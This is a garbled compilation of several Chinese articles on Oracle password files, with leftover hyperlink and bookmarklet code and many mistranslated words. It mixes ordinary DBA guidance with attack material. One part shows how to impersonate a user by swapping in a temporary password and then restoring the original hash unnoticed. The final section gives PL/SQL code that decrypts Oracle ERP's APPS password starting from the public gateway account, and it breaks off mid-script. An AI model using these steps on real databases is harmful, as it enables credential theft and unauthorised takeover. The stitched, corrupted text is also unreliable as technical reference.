Oracle密碼文件的使用和維護(hù)

1、.：.；Oracle密碼文件的運(yùn)用和維護(hù)【 HYPERLINK javascript:doZoom(16,19) 大 HYPERLINK javascript:doZoom(14,17) 中 HYPERLINK javascript:doZoom(12,15) 小】【 HYPERLINK 7880/Print.php?PID=6d5cd380 打印】【 HYPERLINK 7880/Favorite.php?Go=Info:36ae69c0 參與收藏】【 HYPERLINK javascript:window.close() 封鎖】 【 HYPERLINK javascript:d=docum

2、ent;t=d.selection?(d.selection.type!=None?d.selection.createRange().text:):(d.getSelection?d.getSelection():);void(vivi=window.open(vivi.sina/collect/icollect.php?pid=2021&title=+escape(d.title)+&url=+escape(d.location.href)+&desc=+escape(t),vivi,scrollbars=no,width=480,height=480,left=75,top=20,sta

3、tus=no,resizable=yes);vivi.focus(); o 收藏的網(wǎng)頁將被永久地保管到新浪ViVi收藏夾httpvivi.sina 收藏到新浪ViVi】【 HYPERLINK javascript:d=document;t=d.selection?(d.selection.type!=None?d.selection.createRange().text:):(d.getSelection?d.getSelection():);void(keyit=window.open(365key/storeit.aspx?t=+escape(d.title)+&u=+escape(d.l

4、ocation.href)+&c=+escape(t),keyit,scrollbars=no,width=475,height=575,left=75,top=20,status=no,resizable=yes);keyit.focus(); o 功能強(qiáng)大的網(wǎng)絡(luò)收藏夾，一秒鐘操作就可以輕松實(shí)現(xiàn)保管帶來的價(jià)值、分享帶來的高興 收藏到365KEY】 閱讀字號:日期：2004-11-08 人氣： 1743 出處： 概要：Oracle關(guān)系數(shù)據(jù)庫系統(tǒng)以其杰出的性能獲得了廣泛的運(yùn)用，而保證數(shù)據(jù)庫的平安性是數(shù)據(jù)庫管理任務(wù)的重要內(nèi)容。本文是筆者在總結(jié)Oracle數(shù)據(jù)庫平安管理任務(wù)的根底上，對Oracle數(shù)

5、據(jù)庫系統(tǒng)密碼文件的創(chuàng)建、運(yùn)用和維護(hù)作了詳細(xì)的引見，供大家參考。 在Oracle數(shù)據(jù)庫系統(tǒng)中，用戶假設(shè)要以特權(quán)用戶身份INTERNALSYSDBASYSOPER登錄Oracle數(shù)據(jù)庫可以有兩種身份驗(yàn)證的方法：即使用與操作系統(tǒng)集成的身份驗(yàn)證或運(yùn)用Oracle數(shù)據(jù)庫的密碼文件進(jìn)展身份驗(yàn)證。因此，管理好密碼文件，對于控制授權(quán)用戶從遠(yuǎn)端或本機(jī)登錄Oracle數(shù)據(jù)庫系統(tǒng)，執(zhí)行數(shù)據(jù)庫管理任務(wù)，具有重要的意義。 Oracle數(shù)據(jù)庫的密碼文件存放有超級用戶INTERNALSYS的口令及其他特權(quán)用戶的用戶名口令，它普通存放在ORACLE_HOMEDATABASE目錄下。 一、密碼文件的創(chuàng)建： 在運(yùn)用Oracle

6、Instance Manager創(chuàng)建一數(shù)據(jù)庫實(shí)例的時(shí)侯，在ORACLE_HOMEDATABASE目錄下還自動(dòng)創(chuàng)建了一個(gè)與之對應(yīng)的密碼文件，文件名為PWDSID.ORA，其中SID代表相應(yīng)的Oracle數(shù)據(jù)庫系統(tǒng)標(biāo)識符。此密碼文件是進(jìn)展初始數(shù)據(jù)庫管理任務(wù)的根底。在此之后，管理員也可以根據(jù)需求，運(yùn)用工具ORAPWD.EXE手工創(chuàng)建密碼文件，命令格式如下： C: ORAPWDFILE= FILENAME PASSWORD = PASSWORD ENTRIES= 各命令參數(shù)的含義為： FILENAME：密碼文件名； PASSWORD：設(shè)置INTERNALSYS帳號的口令； MAX_USERS：密碼文件

7、中可以存放的最大用戶數(shù)，對應(yīng)于允許以SYSDBASYSOPER權(quán)限登錄數(shù)據(jù)庫的最大用戶數(shù)。由于在以后的維護(hù)中，假設(shè)用戶數(shù)超出了此限制，那么需求重建密碼文件，所以此參數(shù)可以根據(jù)需求設(shè)置得大一些。 有了密碼文件之后，需求設(shè)置初始化參數(shù)REMOTE_LOGIN_PASSWORDFILE來控制密碼文件的運(yùn)用形狀。二、設(shè)置初始化參數(shù)REMOTE_LOGIN_PASSWORDFILE： 在Oracle數(shù)據(jù)庫實(shí)例的初始化參數(shù)文件中，此參數(shù)控制著密碼文件的運(yùn)用及其形狀。它可以有以下幾個(gè)選項(xiàng)：NONE：指示Oracle系統(tǒng)不運(yùn)用密碼文件，特權(quán)用戶的登錄經(jīng)過操作系統(tǒng)進(jìn)展身份驗(yàn)證； EXCLUSIVE：指示只需一個(gè)

8、數(shù)據(jù)庫實(shí)例可以運(yùn)用此密碼文件。只需在此設(shè)置下的密碼文件可以包含有除INTERNALSYS以外的用戶信息，即允許將系統(tǒng)權(quán)限SYSOPERSYSDBA授予除INTERNALSYS以外的其他用戶。 SHARED：指示可有多個(gè)數(shù)據(jù)庫實(shí)例可以運(yùn)用此密碼文件。在此設(shè)置下只需INTERNALSYS帳號能被密碼文件識別，即使文件中存有其他用戶的信息，也不允許他們以SYSOPERSYSDBA的權(quán)限登錄。此設(shè)置為缺省值。 在REMOTE_LOGIN_PASSWORDFILE參數(shù)設(shè)置為EXCLUSIVE、SHARED情況下，Oracle系統(tǒng)搜索密碼文件的次序?yàn)椋涸谙到y(tǒng)注冊庫中查找ORA_SID_PWFILE參數(shù)值它

9、為密碼文件的全途徑名；假設(shè)未找到，那么查找ORA_PWFILE參數(shù)值；假設(shè)仍未找到，那么運(yùn)用缺省值ORACLE_HOMEDATABASEPWDSID.ORA；其中的SID代表相應(yīng)的Oracle數(shù)據(jù)庫系統(tǒng)標(biāo)識符。 三、向密碼文件中添加、刪除用戶： 當(dāng)初始化參數(shù)REMOTE_LOGIN_PASSWORDFILE設(shè)置為EXCLUSIVE時(shí)，系統(tǒng)允許除INTERNALSYS以外的其他用戶以管理員身份從遠(yuǎn)端或本機(jī)登錄到Oracle數(shù)據(jù)庫系統(tǒng)，執(zhí)行數(shù)據(jù)庫管理任務(wù)；這些用戶名必需存在于密碼文件中，系統(tǒng)才干識別他們。由于不論是在創(chuàng)建數(shù)據(jù)庫實(shí)例時(shí)自動(dòng)創(chuàng)建的密碼文件，還是運(yùn)用工具ORAPWD.EXE手工創(chuàng)建的密碼

10、文件，都只包含INTERNALSYS用戶的信息；為此，在實(shí)踐操作中，能夠需求向密碼文件添加或刪除其他用戶帳號。 由于僅被授予SYSOPERSYSDBA系統(tǒng)權(quán)限的用戶才存在于密碼文件中，所以當(dāng)向某一用戶授予或收回SYSOPERSYSDBA系統(tǒng)權(quán)限時(shí)，他們的帳號也將相應(yīng)地被參與到密碼文件或從密碼文件中刪除。由此，向密碼文件中添加或刪除某一用戶，實(shí)踐上也就是對某一用戶授予或收回SYSOPERSYSDBA系統(tǒng)權(quán)限。 要進(jìn)展此項(xiàng)授權(quán)操作，需運(yùn)用SYSDBA權(quán)限或INTERNAL帳號連入數(shù)據(jù)庫，且初始化參數(shù)REMOTE_LOGIN_PASSWORDFILE的設(shè)置必需為EXCLUSIVE。詳細(xì)操作步驟如下：

11、 創(chuàng)建相應(yīng)的密碼文件； 設(shè)置初始化參數(shù)REMOTE_LOGIN_PASSWORDFILEEXCLUSIVE； 運(yùn)用SYSDBA權(quán)限登錄： CONNECTSYSinternal_user_passswordASSYSDBA； 啟動(dòng)數(shù)據(jù)庫實(shí)例并翻開數(shù)據(jù)庫； 創(chuàng)建相運(yùn)用戶帳號，對其授權(quán)包括SYSOPER和SYSDBA： 授予權(quán)限：GRANTSYSDBATOuser_name； 收回權(quán)限：REVOKESYSDBAFROMuser_name； 如今這些用戶可以以管理員身份登錄數(shù)據(jù)庫系統(tǒng)了；四、運(yùn)用密碼文件登錄： 有了密碼文件后，用戶就可以運(yùn)用密碼文件以SYSOPERSYSDBA權(quán)限登錄Oracle數(shù)據(jù)庫

12、實(shí)例了，留意初始化參數(shù)REMOTE_LOGIN_PASSWORDFILE應(yīng)設(shè)置為EXCLUSIVE或SHARED。任何用戶以SYSOPERSYSDBA的權(quán)限登錄后，將位于SYS用戶的Schema之下，以下為兩個(gè)登錄的例子： 1.以管理員身份登錄： 假設(shè)用戶scott已被授予SYSDBA權(quán)限，那么他可以運(yùn)用以下命令登錄： CONNECTscotttigerASSYSDBA 2.以INTERNAL身份登錄： CONNECTINTERNALINTERNAL_PASSWORD 五、密碼文件的維護(hù)： 1.查看密碼文件中的成員： 可以經(jīng)過查詢視圖V$PWFILE_USERS來獲取擁有SYSOPERSYSD

13、BA系統(tǒng)權(quán)限的用戶的信息，表中SYSOPERSYSDBA列的取值TRUEFALSE表示此用戶能否擁有相應(yīng)的權(quán)限。這些用戶也就是相應(yīng)地存在于密碼文件中的成員。 2.擴(kuò)展密碼文件的用戶數(shù)量： 當(dāng)向密碼文件添加的帳號數(shù)目超越創(chuàng)建密碼文件時(shí)所定的限制即ORAPWD.EXE工具的MAX_USERS參數(shù)時(shí)，為擴(kuò)展密碼文件的用戶數(shù)限制，需重建密碼文件，詳細(xì)步驟如下： a)查詢視圖V$PWFILE_USERS，記錄下?lián)碛蠸YSOPERSYSDBA系統(tǒng)權(quán)限的用戶信息； b)封鎖數(shù)據(jù)庫； c)刪除密碼文件； d)用ORAPWD.EXE新建一密碼文件； e)將步驟a中獲取的用戶添加到密碼文件中。 3.修正密碼文件的

14、形狀： 密碼文件的形狀信息存放于此文件中，當(dāng)它被創(chuàng)建時(shí)，它的缺省形狀為SHARED。可以經(jīng)過改動(dòng)初始化參數(shù)REMOTE_LOGIN_PASSWORDFILE的設(shè)置改動(dòng)密碼文件的形狀。當(dāng)啟動(dòng)數(shù)據(jù)庫事例時(shí)，Oracle系統(tǒng)從初始化參數(shù)文件中讀取REMOTE_LOGIN_PASSWORDFILE參數(shù)的設(shè)置；當(dāng)加載數(shù)據(jù)庫時(shí)，系統(tǒng)將此參數(shù)與口令文件的形狀進(jìn)展比較，假設(shè)不同，那么更新密碼文件的形狀。假設(shè)方案允許從多臺客戶機(jī)上啟動(dòng)數(shù)據(jù)庫實(shí)例，由于各客戶機(jī)上必需有初始化參數(shù)文件，所以應(yīng)確保各客戶機(jī)上的初始化參數(shù)文件的一致性，以防止不測地改動(dòng)了密碼文件的形狀，呵斥數(shù)據(jù)庫登陸的失敗。 4.修正密碼文件的存儲位置：

15、 密碼文件的存放位置可以根據(jù)需求進(jìn)展挪動(dòng)，但作此修正后，應(yīng)相應(yīng)修正系統(tǒng)注冊庫有關(guān)指向密碼文件存放位置的參數(shù)或環(huán)境變量的設(shè)置。 5.刪除密碼文件： 在刪除密碼文件前,應(yīng)確保當(dāng)前運(yùn)轉(zhuǎn)的各數(shù)據(jù)庫實(shí)例的初始化參數(shù)REMOTE_LOGIN_PASSWORDFILE皆設(shè)置為NONE。在刪除密碼文件后，假想象要以管理員身份連入數(shù)據(jù)庫的話，那么必需運(yùn)用操作系統(tǒng)驗(yàn)證的方法進(jìn)展登錄詳細(xì)講述 Oracle 密碼喪失處理方法佚名來源：不詳點(diǎn)擊數(shù)： 72更新時(shí)間：2007年05月05日在運(yùn)用Oracle過各中經(jīng)常會遇到密碼喪失的時(shí)候，本文用兩種試來處理這個(gè)問題。 一種方法: sqlplus / as sysdbaSQL

16、startupSQLalter user system identified by root123;假設(shè)sqlplus / as sysdba不能進(jìn)入,讓輸入密碼,我輸入原始密碼和修正的密碼后都不行的話,修正unix環(huán)境下: 1. $ORACLE_HOMEnetworkadminSQLNET.ORA中為： SQLNET.AUTHENTICATION_SERVICES=(NTS) 重起數(shù)據(jù)庫/監(jiān)聽效力，就可以用操作系統(tǒng)認(rèn)證sqlplus / as sysdba了,來進(jìn)入他的數(shù)據(jù)庫，從而輕而易舉的搞定他的數(shù)據(jù)庫了。 2. sqlplus /nolog sqlconnect /as sysdba第二

17、種方法: 詳細(xì)步驟如下： 一：查詢視圖V$PWFILE_USERS：select * from V$PWFILE_USERS；記錄下?lián)碛?SYSOPERSYSDBA系統(tǒng)權(quán)限的用戶信息。 二：封鎖數(shù)據(jù)庫 shutdown immediate。 三：刪除密碼文件，文件途徑普通為：ORACLE_HOMEDATABASE，文件名為PWD.ORA。 四：創(chuàng)建密碼文件： ORAPWDFILE= FILENAME PASSWORD = PASSWORD 五：向密碼文件中添加用戶： CONNECTSYSinternal_user_passsword ASSYSDBA； 啟動(dòng)數(shù)據(jù)庫實(shí)例并翻開數(shù)據(jù)庫； 創(chuàng)建相運(yùn)用

18、戶帳號，對其授權(quán)授予 權(quán)限：GRANTSYSDBATO user_name假設(shè)先前數(shù)據(jù)庫只需sys具有sysdba權(quán)限，可不做這步。 六：修正密碼文件形狀，默許密碼文件的形狀shared，要將初始化參數(shù)里的REMOTE_LOGIN_PASSWORDFILE 設(shè)置成EXCLUSIVE。T006 個(gè)修正Oracle用戶密碼的小竅門 數(shù)據(jù)庫版本：有時(shí)候我們能夠不知道一個(gè)用戶的密碼，但是又需求以這個(gè)用戶做一些操作，又不能去修正掉這個(gè)用戶的密碼，這個(gè)時(shí)候，就可以利用一些小竅門，來完成操作。詳細(xì)操作過程如下：SQL*Plus: Release .0 - Production on 星期日 11月 21 1

19、3:32:34 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.SQL connect sys/oracle as sysdba已銜接。SQL select username,password from dba_users;USERNAME PASSWORD- -SYS 8A8F025737A9097ASYSTEM 2D594E86F93B17A1DBSNMP E066D214D5421CCCTOAD A1BA01CF0DD82695OUTLN 4A3BA55E08595C81WMSYS 7C9BA36

20、2F8314299已選擇6行。SQL connect system/oracle已銜接。SQL connect sys/oracle as sysdba已銜接。修正用戶system密碼為managerSQL alter user system identified by manager;用戶已更改。SQL select username,password from dba_users;USERNAME PASSWORD- -SYS 8A8F025737A9097ASYSTEM D4DF7931AB130E37DBSNMP E066D214D5421CCCTOAD A1BA01CF0DD8269

21、5OUTLN 4A3BA55E08595C81WMSYS 7C9BA362F8314299已選擇6行。SQL connect system/manager已銜接。然后此時(shí)可以做想要做的任何操作了SQL connect sys/oracle as sysdba已銜接。修正用戶system密碼為以前的值SQL alter user system identified by values 2D594E86F93B17A1;用戶已更改。SQL connect system/oracle已銜接。SQL connect sys/oracle as sysdba已銜接。SQL connect system/

22、managerERROR:ORA-01017: invalid username/password; logon denied警告: 您不再銜接到 ORACLE。Oracle中password file的作用及闡明 HYPERLINK eygle eygle | HYPERLINK translate.google/translate?langpair=zh-CN%7Cen&hl=zh-CN&ie=UTF8&u=%3A/eygle/faq/passwordfile.htm t _blank English Version HYPERLINK eygle/ o By eygle 【 HYPERL

23、INK /licenses/by-sa/2.5/ 版權(quán)聲明：轉(zhuǎn)載時(shí)請務(wù)必以超鏈接方式標(biāo)明文章 HYPERLINK eygle/archives/2004/06/passwordfile.html 原始出處和作者信息及 HYPERLINK eygle/archives/2006/12/eygle_copyright.html 本聲明】鏈接： HYPERLINK eygle/archives/2004/06/passwordfile.html eygle/archives/2004/06/passwordfile.html 站內(nèi)相關(guān)文章|Related Articles HYPERLINK eyg

24、le/archives/2007/03/linuxunix_timer.html Oracle與Linux/Unix下的時(shí)間處置 HYPERLINK eygle/archives/2007/02/oracle_ace_china.html Oracle ACE China的一個(gè)小小聚會 HYPERLINK eygle/archives/2007/01/2006_erp_whois_best.html 2006 中國ERP市場誰主沉浮? HYPERLINK eygle/archives/2006/11/2006q3_china_database_market_share.html 2006年Q3

25、中國數(shù)據(jù)庫市場 Oracle再占首位 HYPERLINK eygle/archives/2006/11/lsnrctl_set_logfile.html 如何更改監(jiān)聽器日志文件稱號在數(shù)據(jù)庫沒有啟動(dòng)之前，數(shù)據(jù)庫內(nèi)建用戶是無法經(jīng)過數(shù)據(jù)庫來驗(yàn)證身份的口令文件中存放sysdba/sysoper用戶的用戶名及口令允許用戶經(jīng)過口令文件驗(yàn)證，在數(shù)據(jù)庫未啟動(dòng)之前登陸從而啟動(dòng)數(shù)據(jù)庫假設(shè)沒有口令文件，在數(shù)據(jù)庫未啟動(dòng)之前就只能經(jīng)過操作系統(tǒng)認(rèn)證.運(yùn)用Rman，很多時(shí)候需求在nomount,mount等形狀對數(shù)據(jù)庫進(jìn)展處置所以通常要求sysdba權(quán)限假設(shè)屬于本地DBA組，可以經(jīng)過操作系統(tǒng)認(rèn)證登陸假設(shè)是遠(yuǎn)程sysdba登

26、陸，需求經(jīng)過passwordfile認(rèn)證.1.remote_login_passwordfile = NONE此時(shí)停用口令文件驗(yàn)證，Oracle數(shù)據(jù)庫不允許遠(yuǎn)程SYSDBA/SYSOPER身份登錄無法經(jīng)過遠(yuǎn)程進(jìn)展數(shù)據(jù)庫起停等操作管理local:oraclejumper oracle$ sqlplus / as sysdbaSQL*Plus: Release .0 - Production on Thu Apr 15 09:58:45 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.Connected t

27、o:Oracle9i Enterprise Edition Release .0 - ProductionWith the Partitioning, OLAP and Oracle Data Mining optionsJServer Release .0 - ProductionSQL alter user sys identified by oracle;User altered.SQL show parameter passNAME TYPE VALUE- - -remote_login_passwordfile string NONE remote:E:Oracleora92bins

28、qlplus /nologSQL*Plus: Release .0 - Production on 星期四 4月 15 09:39:22 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.SQL connect sys/oraclehsjf as sysdbaERROR:ORA-01017: invalid username/password; logon denied此處實(shí)踐上是無法經(jīng)過口令文件驗(yàn)證2.remote_login_passwordfile = exclusiveSQL alter syst

29、em set remote_login_passwordfile=exclusive scope=spfile;System altered.SQL startup force;ORACLE instance started.Total System Global Area 131142648 bytesFixed Size 451576 bytesVariable Size 104857600 bytesDatabase Buffers 25165824 bytesRedo Buffers 667648 bytesDatabase mounted.Database opened.SQL sh

30、ow parameter passNAME TYPE VALUE- - -remote_login_passwordfile string EXCLUSIVESQL alter user sys identified by oracle;User altered.remote: E:Oracleora92binsqlplus /nologSQL*Plus: Release .0 - Production on 星期四 4月 15 09:47:11 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.SQL

31、connect sys/oraclehsjf as sysdba已銜接。SQL show userUSER 為SYSSQL這實(shí)踐上就是經(jīng)過口令文件驗(yàn)證登錄的 3.進(jìn)一步測試假設(shè)此時(shí)我們刪除passwdfile,sysdba/sysoper將無法認(rèn)證，也就無法登陸數(shù)據(jù)庫Server: SQL !oraclejumper oracle$ cd $ORACLE_HOME/dbsoraclejumper dbs$ ls orapwhsjforapwhsjforaclejumper dbs$ mv orapwhsjf orapwhsjf.bakoraclejumper dbs$ Remote: E:Or

32、acleora92binsqlplus /nologSQL*Plus: Release .0 - Production on 星期四 4月 15 09:50:14 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.SQL connect sys/oraclehsjf as sysdbaERROR:ORA-01031: insufficient privilegesSQL這實(shí)踐上就是無法經(jīng)過口令文件驗(yàn)證身份4.假設(shè)喪失了passwdfile假設(shè)運(yùn)用passwdfile卻不測喪失，此時(shí)將不能啟動(dòng)數(shù)據(jù)庫SQL

33、startup force;ORACLE instance started.Total System Global Area 131142648 bytesFixed Size 451576 bytesVariable Size 104857600 bytesDatabase Buffers 25165824 bytesRedo Buffers 667648 bytesORA-01990: error opening password file /opt/oracle/product/9.2.0/dbs/orapwORA-27037: unable to obtain file statusL

34、inux Error: 2: No such file or directoryAdditional information: 3此時(shí)可以經(jīng)過orapwd重建口令文件來處理此處我們恢復(fù)口令文件既可SQL !oraclejumper oracle$ mv $ORACLE_HOME/dbs/orapwhsjf.bak orapwhsjforaclejumper oracle$ exitexitSQL alter database open;Database altered.SQL 大致就是如此.5. remote_login_passwordfile = shared我們看一下Oracle9i文檔

35、中的闡明:SHARED More than one database can use a password file. However, the only user recognized by the password file is SYS.意思是說多個(gè)數(shù)據(jù)庫可以共享一個(gè)口令文件,但是只可以識別一個(gè)用戶:SYSSQL select * from v$pwfile_users;USERNAME SYSDB SYSOP- - -SYS TRUE TRUESQL grant sysdba to eygle;grant sysdba to eygle*ERROR at line 1:ORA-0199

36、4: GRANT failed: cannot add users to public password fileSQL show parameter passwordNAME TYPE VALUE- - -remote_login_passwordfile string SHARED我們看到,此時(shí)的口令文件中是不能添加用戶的.很多人的疑問在于:口令文件的缺省稱號是orapw,怎樣可以共享? 實(shí)踐上是這樣的: Oracle數(shù)據(jù)庫在啟動(dòng)時(shí),首先查找的是orapw的口令文件,假設(shè)該文件不存在,那么開場查找,orapw的口令文件假設(shè)口令文件命名為orapw,多個(gè)數(shù)據(jù)庫就可以共享.我們看一下測試:or

37、aclejumper dbs$ sqlplus / as sysdbaSQL*Plus: Release .0 - Production on Tue Jul 6 09:40:34 2004Copyright (c) 1982, 2002, Oracle Corporation. All rights reserved.Connected to:Oracle9i Enterprise Edition Release .0 - ProductionWith the Partitioning, OLAP and Oracle Data Mining optionsJServer Release .

38、0 - ProductionSQL shutdown immediateDatabase closed.Database dismounted.ORACLE instance shut down.SQL !oraclejumper dbs$ lshsjf initdw.ora inithsjf.ora init.ora lkHSJF orapwhsjf spfilehsjf.oraoraclejumper dbs$ mv orapwhsjf orapwhsjf.bakoraclejumper dbs$ exitexitSQL startupORACLE instance started.Tot

39、al System Global Area 235999908 bytesFixed Size 451236 bytesVariable Size 202126592 bytesDatabase Buffers 33554432 bytesRedo Buffers 667648 bytesORA-01990: error opening password file /opt/oracle/product/9.2.0/dbs/orapw-這是最后查找的文件ORA-27037: unable to obtain file statusLinux Error: 2: No such file or

40、directoryAdditional information: 3 我們建立orapw口令文件,這時(shí)候可以翻開數(shù)據(jù)庫.SQL !oraclejumper dbs$ lshsjf initdw.ora inithsjf.ora init.ora lkHSJF orapwhsjf.bak spfilehsjf.oraoraclejumper dbs$ cp orapwhsjf.bak orapworaclejumper dbs$ exitexitSQL alter database open;Database altered.SQL show parameter passwNAME TYPE V

41、ALUE- - -remote_login_passwordfile string SHAREDSQL 那么他能夠會有這樣的疑問,多個(gè)Exclusive的數(shù)據(jù)庫能否可以共享一個(gè)口令文件(orapw)呢?我們繼續(xù)這個(gè)實(shí)驗(yàn):SQL show parameter passwordNAME TYPE VALUE- - -remote_login_passwordfile string SHAREDoraclejumper dbs$ strings orapwZORACLE Remote Password fileINTERNALAB27B53EDC5FEF418A8F025737A9097A留意這里僅

42、記錄著INTERNAL/SYS的口令REMOTE_LOGIN_PASSWORDFILE=EXCLUSIVE 時(shí)SQL alter system set remote_login_passwordfile=exclusive scope=spfile;System altered.SQL startup force;ORACLE instance started.Total System Global Area 235999908 bytesFixed Size 451236 bytesVariable Size 202126592 bytesDatabase Buffers 33554432

43、bytesRedo Buffers 667648 bytesDatabase mounted.Database opened.SQL !oraclejumper bin$ cd $ORACLE_HOME/dbsoraclejumper dbs$ strings orapwZORACLE Remote Password fileHSJFINTERNALAB27B53EDC5FEF418A8F025737A9097Aoraclejumper dbs$ exitexit留意這里,以EXCLUSIVE 方式啟動(dòng)以后,實(shí)例稱號信息被寫入口令文件.此時(shí)假設(shè)有其他實(shí)例以Exclusive方式啟動(dòng)依然可以運(yùn)用

44、這個(gè)口令文件,口令文件中的實(shí)例稱號同時(shí)被改寫.也就是說,數(shù)據(jù)庫只在啟動(dòng)過程中才讀取口令文件,數(shù)據(jù)庫運(yùn)轉(zhuǎn)過程中并不鎖定該文件,類似于pfile/spfile文件.SQL select * from v$pwfile_users;USERNAME SYSDB SYSOP- - -SYS TRUE TRUESQL grant sysdba to eygle;Grant succeeded.SQL select * from v$pwfile_users;USERNAME SYSDB SYSOP- - -SYS TRUE TRUEEYGLE TRUE FALSESQL !oraclejumper bi

45、n$ cd $ORACLE_HOME/dbsoraclejumper dbs$ strings orapwZORACLE Remote Password fileHSJFINTERNALAB27B53EDC5FEF418A8F025737A9097AEYGLEB726E09FE21F8E83留意此時(shí)可以添加SYSDBA用戶，并且這些信息可以被寫入到口令文件.一旦口令文件中添加了其他SYSDBA用戶,此文件不再可以被其他Exclusive的實(shí)例共享.實(shí)踐上，口令文件對于其他用戶來說就是啟到了一個(gè) sudo 的作用.6.重建口令文件假設(shè)口令文件喪失,可以運(yùn)用orapwd可以重建口令文件，語法如下:

46、oraclejumper oracle$ orapwdUsage: orapwd file= password= entries= wherefile - name of password file (mand),password - password for SYS (mand),entries - maximum number of distinct DBA and OPERs (opt), There are no spaces around the equal-to (=) character.破解Oracle普通用戶的口令 HYPERLINK 21itjob/ t _blank it

47、lab推出人才網(wǎng)，2萬IT職位熱聘中 HYPERLINK 21itjob/job/company_intra.aspx?memberid=wolftel o 朗元無線通訊技術(shù)杭州 t _blank 杭州朗元無線通訊技術(shù) HYPERLINK 21itjob/job/company_hire_detail.aspx?info_id=9212 t _blank 高級ORACLE DBA HYPERLINK 21itjob/job/company_intra.aspx?memberid=hr002 o 北京華安天誠科技 t _blank 北京華安天誠科技 HYPERLINK 21itjob/job/c

48、ompany_hire_detail.aspx?info_id=7119 t _blank 數(shù)據(jù)庫工程師 HYPERLINK product.it168/list/b/03050230_1.shtml t _blank 索尼數(shù)碼相機(jī)報(bào)價(jià)大全 HYPERLINK 1010school/software/aspdotnet/index.htm o Web2.0創(chuàng)業(yè)寶典 t _blank 網(wǎng)校引薦課程 Web2.0創(chuàng)業(yè)寶典 HYPERLINK 1010school/network/ccnp5/index.html o 2007 新版CCNP課程5.0 t _blank 網(wǎng)校引薦課程 2007 新版C

49、CNP課程5.0 ChinaITLab 搜集整理 2004-11-17 HYPERLINK javascript:window.external.AddFavorite(cisco.chinaitlab/install/26790.html,破解Oracle普通用戶的口令|中國IT實(shí)驗(yàn)室) t _top 保管本文 HYPERLINK cisco.chinaitlab/install/26790.html 引薦給好友 HYPERLINK javascript:window.external.AddFavorite(chinaitlab,中國IT實(shí)驗(yàn)室) t _top 收藏本站 我如今用一個(gè)系統(tǒng)(

50、GeoMedia),他有一個(gè)自建的用戶(GDOSYS)，誰能通知我怎樣知道這個(gè)用戶的口令呢.從以上對話中得知，估計(jì)程序里面有了用戶名和密碼的語句，他可以經(jīng)過這招修正密碼，然后修正數(shù)據(jù)，在把密碼改回去-FROMORADB.NET貼來的如何取出某一用戶的密碼，再原封不動(dòng)的改回去？軟件環(huán)境：1、WindowsNT4.0+ORACLE8.0.42、ORACLE安裝途徑為：C:ORANT實(shí)現(xiàn)方法：SQLconnsystem/managerSQLselectpasswordfromdba_userswhereusername=USER1;(用戶名一定要用大寫)結(jié)果：1F8E5A929B6861AC(這就是

51、此用戶的密碼)SQLalteruserUSER1identifiedbyaaa;(改動(dòng)此用戶的密碼為aaa)SQLconnuser1/aaa(銜接到用戶上，？)SQL執(zhí)行他想要的操作.SQLconnsystem/managerSQLalteruserUSER1identifiedbyvalues1F8E5A929B6861AC;(改回原有密碼)破解Oracle ERP 密碼1. 寫作目的在要不要寫出來讓大家知道這個(gè)問題上想了很久, 但一想到遲早密碼破解的方法還是會被人知道的,與其讓少部分人知道,還不如讓大家都知道,事先好作防備. 公布密碼破解方法的目的還是想讓Oracle ERP做得更平安一點(diǎn)

52、,讓我們大家放心的去用,畢竟是幾千萬的東西,如今的平安性顯然還達(dá)不到用戶的要求. 想借大家的力量給Oracle施加一點(diǎn)壓力,以將Oracle ERP的各個(gè)版本改得平安一點(diǎn).2. 利用Toad或其它pl/sql工具在Oracle ERP Database中建立Package,源碼如下(1).建立Package HeaderCREATE OR REPLACE PACKAGE CrackPwd AUTHID CURRENT_USERAS FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2) RETURN VARCHAR2;END

53、CrackPwd;(2).建立Package BodyCREATE OR REPLACE PACKAGE BODY CrackPwdAS FUNCTION getpwd (orauser IN VARCHAR2, appuserpwd IN VARCHAR2) RETURN VARCHAR2 AS LANGUAGE JAVA NAME oracle.apps.fnd.security.WebSessionManagerProc.decrypt(java.lang.String,java.lang.String) return java.lang.String;END CrackPwd;/3.

54、獲得APPS密碼的步驟假設(shè)如今什么Oracle erp權(quán)限都沒有,怎樣去知道oracle erp databaes的權(quán)限呢? 我們知道Oracle erp提供了一個(gè)database的公用賬戶(gateway user),此賬戶擁有database的最小權(quán)限,這個(gè)公用賬號是: APPLSYSPUB/PUB(oracle erp網(wǎng)頁中或URL中都有公開此賬戶),雖然此賬戶沒有什么權(quán)限,但卻有FND_USER_VIEW 的查詢權(quán)限,經(jīng)過這個(gè)view可以看到erp中一切的user和其ENCRYPED_FOUNDATION_PASSWORD字段,問題就出在這個(gè)view的ENCRYPED_FOUNDATI

55、ON_PASSWORD字段上, ENCRYPED_FOUNDATION_PASSWORD這個(gè)字段是由APPS的密碼和用戶密碼一同經(jīng)過加密算法得出的結(jié)果, 因此只需知道Oracle ERP的解密算法就可以經(jīng)過fnd_user中任何一個(gè)user的password反查apps的密碼.,而要知道fnd_user中任何一個(gè)user的密碼是太簡單的事了,在erp安裝時(shí)就預(yù)設(shè)了很多賬戶,這些賬戶的user name和password都是一樣的,普通沒有人去改這些賬戶的密碼4. 經(jīng)過任何一個(gè)User name/password獲得APPS密碼的方法SET SERVEROUTPUT ONDECLAREguest

56、UserPwd VARCHAR2(200);guestUserName VARCHAR2(100);guestFndPwd VARCHAR2(100);guestEncFndPwd VARCHAR2(100);delim NUMBER;BEGINguestUserPwd :=GUEST/ORACLE;-Can any user passwordIFguestUserPwd IS NULL THEN guestUserPwd := UPPER(fnd_profile.value(GUEST_USER_PWD);END IF;delim := INSTR(guestUserPwd,/);guest

57、UserName := UPPER(SUBSTR(guestUserPwd,1,delim-1); SELECT encrypted_foundation_password INTO guestEncFndPwdFROM fnd_user_viewWHERE user_name = guestUserName AND (start_date SYSDATE); guestFndPwd :=CrackPwd.getpwd(guestUserPwd,guestEncFndPwd); IF NOT (guestFndPwd IS NULL) THEN DBMS_OUTPUT.put_line(gue

